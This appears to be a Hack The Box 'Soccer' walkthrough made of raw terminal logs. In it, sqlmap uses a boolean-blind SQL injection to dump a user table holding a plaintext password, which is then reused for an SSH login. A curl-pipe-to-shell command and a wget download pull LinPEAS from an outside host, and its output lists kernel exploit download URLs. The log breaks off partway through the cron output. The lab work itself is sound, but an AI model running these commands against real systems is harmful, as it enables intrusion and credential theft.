|___|_  [.]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:40:04 /2023-03-19/

[13:40:04] [INFO] resuming back-end DBMS 'mysql' 
[13:40:04] [INFO] testing connection to the target URL
[13:40:07] [INFO] testing if the provided string is within the target URL page content
[13:40:07] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:40:07] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[13:40:07] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:40:07] [INFO] fetching database names
[13:40:07] [INFO] fetching number of databases
[13:40:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:40:14] [INFO] retrieved: 5
[13:40:40] [INFO] retrieved: mys^C


[*] ending @ 13:42:09 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists" -D soccerdb --tables
        ___
       __H__                                                                                                                                                                    
 ___ ___[)]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [.]     | .'| . |                                                                                                                                                       
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:42:22 /2023-03-19/

[13:42:22] [INFO] resuming back-end DBMS 'mysql' 
[13:42:22] [INFO] testing connection to the target URL
[13:42:25] [INFO] testing if the provided string is within the target URL page content
[13:42:25] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:42:25] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[13:42:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:42:25] [INFO] fetching tables for database: 'soccerdb'
[13:42:25] [INFO] fetching number of tables for database 'soccerdb'
[13:42:28] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:42:28] [INFO] retrieved: 0
[13:42:56] [WARNING] database 'soccerdb' appears to be empty
[13:42:56] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] y
which common tables (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/data/txt/common-tables.txt' (press Enter)
[2] custom
> 
[13:43:06] [INFO] performing table existence using items from '/usr/share/sqlmap/data/txt/common-tables.txt'
[13:43:06] [INFO] adding words used on web page to the check list
[13:43:06] [INFO] checking database 'soccerdb'
please enter number of threads? [Enter for 1 (current)] 
[13:43:11] [WARNING] running in a single-thread mode. This could take a while
                                                                                                                                                                               
[13:43:27] [WARNING] no table(s) found for database 'soccerdb'
No tables found
[13:43:27] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 13:43:27 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists" --dump-all          
        ___
       __H__                                                                                                                                                                    
 ___ ___[,]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . ["]     | .'| . |                                                                                                                                                       
|___|_  [']_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:43:34 /2023-03-19/

[13:43:34] [INFO] resuming back-end DBMS 'mysql' 
[13:43:34] [INFO] testing connection to the target URL
[13:43:37] [INFO] testing if the provided string is within the target URL page content
[13:43:37] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:43:37] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[13:43:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:43:37] [INFO] sqlmap will dump entries of all tables from all databases now
[13:43:37] [INFO] fetching database names
[13:43:37] [INFO] fetching number of databases
[13:43:41] [INFO] resumed: 5
[13:43:41] [INFO] resuming partial value: mys
[13:43:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:43:41] [INFO] retrieved: ql
[13:44:45] [INFO] retrieved: information_schema
[13:52:18] [INFO] retrieved: performance_schema
[13:59:45] [INFO] retrieved: sys
[14:01:13] [INFO] retrieved: soccer_db
[14:05:20] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, soccer_db, sys'
[14:05:20] [INFO] fetching number of tables for database 'soccer_db'
[14:05:20] [INFO] retrieved: 1
[14:05:41] [INFO] retrieved: accounts
[14:09:06] [INFO] fetching number of tables for database 'mysql'
[14:09:06] [INFO] retrieved: 37
[14:09:51] [INFO] retrieved: c^C


[*] ending @ 14:10:33 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db --tables
        ___
       __H__                                                                                                                                                                    
 ___ ___[(]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [(]     | .'| . |                                                                                                                                                       
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:10:49 /2023-03-19/

[14:10:49] [INFO] resuming back-end DBMS 'mysql' 
[14:10:49] [INFO] testing connection to the target URL
[14:10:54] [INFO] testing if the provided string is within the target URL page content
[14:10:54] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[14:10:54] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[14:10:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[14:10:54] [INFO] fetching tables for database: 'soccer_db'
[14:10:54] [INFO] fetching number of tables for database 'soccer_db'
[14:10:57] [INFO] resumed: 1
[14:10:57] [INFO] resumed: accounts
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+

[14:10:57] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 14:10:57 /2023-03-19/

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1  -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db -T accounts --dump-all
        ___
       __H__                                                                                                                                                                    
 ___ ___[)]_____ ___ ___  {1.7.2#stable}                                                                                                                                        
|_ -| . [.]     | .'| . |                                                                                                                                                       
|___|_  [(]_|_|_|__,|  _|                                                                                                                                                       
      |_|V...       |_|   https://sqlmap.org                                                                                                                                    

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:11:06 /2023-03-19/

[14:11:07] [INFO] resuming back-end DBMS 'mysql' 
[14:11:07] [INFO] testing connection to the target URL
[14:11:10] [INFO] testing if the provided string is within the target URL page content
[14:11:10] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[14:11:10] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: id=-6478 OR 1585=1585
---
[14:11:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[14:11:10] [INFO] sqlmap will dump entries of all tables from all databases now
[14:11:10] [INFO] fetching tables for database: 'soccer_db'
[14:11:10] [INFO] fetching number of tables for database 'soccer_db'
[14:11:16] [INFO] resumed: 1
[14:11:16] [INFO] resumed: accounts
[14:11:16] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[14:11:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:11:16] [INFO] retrieved: 4
[14:11:40] [INFO] retrieved: email
[14:13:50] [INFO] retrieved: id
[14:14:51] [INFO] retrieved: password
[14:18:12] [INFO] retrieved: username
[14:21:37] [INFO] fetching entries for table 'accounts' in database 'soccer_db'
[14:21:37] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'
[14:21:37] [INFO] retrieved: 1
[14:22:01] [INFO] retrieved: [email protected]
[14:29:32] [INFO] retrieved: 1324
[14:31:45] [INFO] retrieved: PlayerOftheMatch2022
[14:40:50] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | [email protected] | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

[14:43:23] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kwkl/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'
[14:43:23] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'

[*] ending @ 14:43:23 /2023-03-19/


try the ssh with using

username player

password PlayerOftheMatch2022

login successfully

https://app.hackthebox.com/machines/Soccer_第22张图片

try the linpeas.sh

From github

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

create the site

                                                                                                                                                                                
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 -m http.server 3333
Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...
10.10.11.194 - - [19/Mar/2023 15:07:33] "GET /linpeas.sh HTTP/1.1" 200 -


download it

We can execute it and get more and more info

player@soccer:~$ wget http://10.10.16.6:3333/linpeas.sh
--2023-03-19 07:07:33--  http://10.10.16.6:3333/linpeas.sh
Connecting to 10.10.16.6:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                  100%[===========================================================================================>] 808.76K   102KB/s    in 8.4s    

2023-03-19 07:07:43 (96.6 KB/s) - ‘linpeas.sh’ saved [828172/828172]

player@soccer:~$ chmod +x linpeas.sh 
player@soccer:~$ ./linpeas.sh 


                            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
                    ▄▄▄▄▄▄▄             ▄▄▄▄▄▄▄▄
             ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄
         ▄▄▄▄     ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
         ▄    ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄          ▄▄▄▄▄▄               ▄▄▄▄▄▄ ▄
         ▄▄▄▄▄▄              ▄▄▄▄▄▄▄▄                 ▄▄▄▄ 
         ▄▄                  ▄▄▄ ▄▄▄▄▄                  ▄▄▄
         ▄▄                ▄▄▄▄▄▄▄▄▄▄▄▄                  ▄▄
         ▄            ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄   ▄▄
         ▄      ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄                                ▄▄▄▄
         ▄▄▄▄▄  ▄▄▄▄▄                       ▄▄▄▄▄▄     ▄▄▄▄
         ▄▄▄▄   ▄▄▄▄▄                       ▄▄▄▄▄      ▄ ▄▄
         ▄▄▄▄▄  ▄▄▄▄▄        ▄▄▄▄▄▄▄        ▄▄▄▄▄     ▄▄▄▄▄
         ▄▄▄▄▄▄  ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄      ▄▄▄▄▄▄▄   ▄▄▄▄▄ 
          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄        ▄          ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
         ▄▄▄▄▄▄▄▄▄▄▄▄▄                       ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄                         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
         ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄            ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
          ▀▀▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
               ▀▀▀▄▄▄▄▄      ▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▀▀
                     ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀

    /---------------------------------------------------------------------------------\
    |                             Do you like PEASS?                                  |                                                                                         
    |---------------------------------------------------------------------------------|                                                                                         
    |         Get the latest version    :     https://github.com/sponsors/carlospolop |                                                                                         
    |         Follow on Twitter         :     @carlospolopm                           |                                                                                         
    |         Respect on HTB            :     SirBroccoli                             |                                                                                         
    |---------------------------------------------------------------------------------|                                                                                         
    |                                 Thank you!                                      |                                                                                         
    \---------------------------------------------------------------------------------/                                                                                         
          linpeas-ng by carlospolop                                                                                                                                             
                                                                                                                                                                                
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.                                                                      
                                                                                                                                                                                
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
 LEGEND:                                                                                                                                                                        
  RED/YELLOW: 95% a PE vector
  RED: You should take a look to it
  LightCyan: Users with console
  Blue: Users without console & mounted devs
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) 
  LightMagenta: Your username

 Starting linpeas. Caching Writable Folders...

                               ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════                                                                                             
                               ╚═══════════════════╝                                                                                                                            
OS: Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022
User & Groups: uid=1001(player) gid=1001(player) groups=1001(player)
Hostname: soccer
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)         
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)                                              
                                                                                                                                                                                
                                                                                                                                                                                

Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
                                                                                                                                                                                
                              ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════                                                                                              
                              ╚════════════════════╝                                                                                                                            
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits                                                                                              
Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022                       
Distributor ID: Ubuntu
Description:    Ubuntu 20.04.5 LTS
Release:        20.04
Codename:       focal

╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version                                                                                                 
Sudo version 1.8.31                                                                                                                                                             

╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560                                                                                                                                                     

Potentially Vulnerable to CVE-2022-2588



╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses                                                                                         
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin                                                                              
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin

╔══════════╣ Date & uptime
Sun Mar 19 07:08:06 UTC 2023                                                                                                                                                    
 07:08:06 up 20:03,  2 users,  load average: 0.15, 0.03, 0.01

╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk                                                                                                                                                                            
sda
sda1
sda2

╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices                                                                                                                                       
LABEL=cloudimg-rootfs   /        ext4   defaults        0 1                                                                                                                     
data /data vboxsf uid=1000,gid=1000,_netdev 0 0
vagrant /vagrant vboxsf uid=1000,gid=1000,_netdev 0 0
/dev/sda1 none swap sw 0 0
proc    /proc   proc    defaults,nodev,relatime,hidepid=2

╔══════════╣ Environment
╚ Any private information inside environment variables?                                                                                                                         
LESSOPEN=| /usr/bin/lesspipe %s                                                                                                                                                 
HISTFILESIZE=0
USER=player
SSH_CLIENT=10.10.16.6 53816 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/player
SSH_TTY=/dev/pts/2
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
LOGNAME=player
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=1391
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=C.UTF-8
HISTSIZE=0
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/player
SSH_CONNECTION=10.10.16.6 53816 10.10.11.194 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null

╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed                                                                          
dmesg Not Found                                                                                                                                                                 
                                                                                                                                                                                
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester                                                                                                                              
[+] [CVE-2022-2586] nft_object UAF                                                                                                                                              

   Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
   Exposure: probable
   Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
   Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: probable
   Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)

   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Details: https://seclists.org/oss-sec/2017/q1/184
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154


╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2                                                                                                                         
                                                                                                                                                                                
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.                                                                                   
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found                                                                                                                               
═╣ Execshield enabled? ............ Execshield Not Found                                                                                                                        
═╣ SELinux enabled? ............... sestatus Not Found                                                                                                                          
═╣ Seccomp enabled? ............... disabled                                                                                                                                    
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)                                                                                                                                

                                   ╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════                                                                                             
                                   ╚═══════════╝                                                                                                                                
╔══════════╣ Container related tools present
/snap/bin/lxc                                                                                                                                                                   
╔══════════╣ Am I Containered?
╔══════════╣ Container details                                                                                                                                                  
═╣ Is this a container? ........... No                                                                                                                                          
═╣ Any running containers? ........ No                                                                                                                                          
                                                                                                                                                                                

                                     ╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════                                                                                             
                                     ╚═══════╝                                                                                                                                  
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No



                ╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════                                                                                              
                ╚════════════════════════════════════════════════╝                                                                                                              
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                     
player    308476  0.0  0.1  10120  5328 pts/2    Ss   07:03   0:00 -bash                                                                                                        
player    308505  0.2  0.0   3664  2712 pts/2    S+   07:07   0:00  _ /bin/sh ./linpeas.sh
player    311609  0.0  0.0   3664  1144 pts/2    S+   07:08   0:00      _ /bin/sh ./linpeas.sh
player    311610  0.0  0.0  10612  3376 pts/2    R+   07:08   0:00      |   _ ps fauxwww
player    311611  0.0  0.0   3664  1144 pts/2    R+   07:08   0:00      _ /bin/sh ./linpeas.sh
player    311613  0.0  0.0   3664  1144 pts/2    S+   07:08   0:00      _ /bin/sh ./linpeas.sh
player      9262  0.0  0.1  10120  5380 pts/1    Ss+  03:26   0:00 -bash
player      9153  0.0  0.2  19116  9736 ?        Ss   03:26   0:00 /lib/systemd/systemd --user
player     11873  0.0  0.1   7108  4004 ?        Ss   03:52   0:00  _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only

╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes                                                                                                    
                                                                                                                                                                                
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information                                                                              
COMMAND      PID   USER   FD      TYPE             DEVICE SIZE/OFF       NODE NAME                                                                                              

╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory                                                                              
gdm-password Not Found                                                                                                                                                          
gnome-keyring-daemon Not Found                                                                                                                                                  
lightdm Not Found                                                                                                                                                               
vsftpd Not Found                                                                                                                                                                
apache2 Not Found                                                                                                                                                               
sshd Not Found                                                                                                                                                                  
                                                                                                                                                                                
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs                                                                                          
/usr/bin/crontab                                                                                                                                                                
incrontab Not Found
-rw-r--r-- 1 root root    1040 Nov 28 22:08 /etc/crontab                                                                                                                        

/etc/cron.d:
total 24
drwxr-xr-x   2 root root 4096 Nov 17 08:51 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rw-r--r--   1 root root  201 Feb 14  2020 e2scrub_all
-rw-r--r--   1 root root  712 Mar 27  2020 php
-rw-r--r--   1 root root  191 Nov 15 21:40 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x   2 root root 4096 Dec  1 18:14 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r--   1 root root  102 Feb 13  2020 .placeholder
-rwxr-xr-x   1 root root  376 Dec  4  2019 apport
-rwxr-xr-x   1 root root 1478 Apr  9  2020 apt-compat
-rwxr-xr-x   1 root root  355 Dec 29  2017 bsdmainutils
-rwxr-xr-x   1 root root 1187 Sep  5  2019 dpkg
-rwxr-xr-x   1 root root  377 Jan 21  2019 logrotate
